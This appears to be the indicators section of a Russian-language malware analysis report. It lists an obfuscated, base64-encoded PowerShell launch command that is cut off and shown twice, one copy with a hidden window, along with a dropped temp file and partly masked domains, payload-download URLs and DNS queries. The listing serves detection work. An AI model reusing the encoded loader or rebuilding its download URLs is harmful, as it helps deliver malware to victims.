Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYgBqAGcAcgBrAD0AKAAoACcASgBpACcAKwAnAHQAdAAnACkAKwAnAHQAJwArACcAbQAzACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBwAFIATwBmAGkAbABFAFwAZgBRAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1206386.cvr
- 'as###music.com':80
- 'as###music.com':443
- 'we###lavera.com':80
- 'va###ana.com':80
- 'va###ana.com':443
- 'rj##ft.nl':80
- 'zo######hootphotography.com':80
- 'pr###l.com.br':80
- 'ie###s.co.za':80
- http://as###music.com/axhhy/2/
- http://we###lavera.com/site/1nBdLgY/
- http://va###ana.com/archive/sEaku/
- http://rj##ft.nl/helpdesk/8TQ54h/
- http://zo######hootphotography.com/wp-includes/MPkwrU2/
- http://pr###l.com.br/pedidos/Sp9/
- 'as###music.com':443
- 'va###ana.com':443
- DNS ASK as###music.com
- DNS ASK we###lavera.com
- DNS ASK va###ana.com
- DNS ASK rj##ft.nl
- DNS ASK zo######hootphotography.com
- DNS ASK pr###l.com.br
- DNS ASK ie###s.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYgBqAGcAcgBrAD0AKAAoACcASgBpACcAKwAnAHQAdAAnACkAKwAnAHQAJwArACcAbQAzACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBwAFIATwBmAGkAbABFAFwAZgBRAF...' (со скрытым окном)